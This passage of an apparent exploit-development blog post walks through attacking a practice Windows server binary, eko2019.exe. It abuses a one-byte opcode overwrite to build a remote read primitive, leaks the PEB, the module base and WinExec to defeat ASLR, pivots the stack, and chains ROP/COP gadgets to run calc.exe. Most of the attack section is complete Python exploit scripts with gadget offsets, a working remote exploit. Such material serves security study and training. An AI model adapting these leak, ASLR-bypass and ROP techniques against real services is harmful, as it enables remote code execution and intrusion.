Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a β€œreturn” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a β€œpseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its β€œfirst” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection

# Allow buffer room

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection

# Allow buffer room

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection

# Allow buffer room

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection

# Allow buffer room

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection

# Allow buffer room

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice

# Close the connection

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string β€œcalc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the β€œdisplay options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a β€œROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string β€œcalc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of β€œcalc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available β€œblank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as β€œCall-Oriented Programming”, or COP. You may be asking β€œthis address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string β€œcalc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to β€œcalc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of β€œcalc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string β€œcalc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string β€œcalc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00


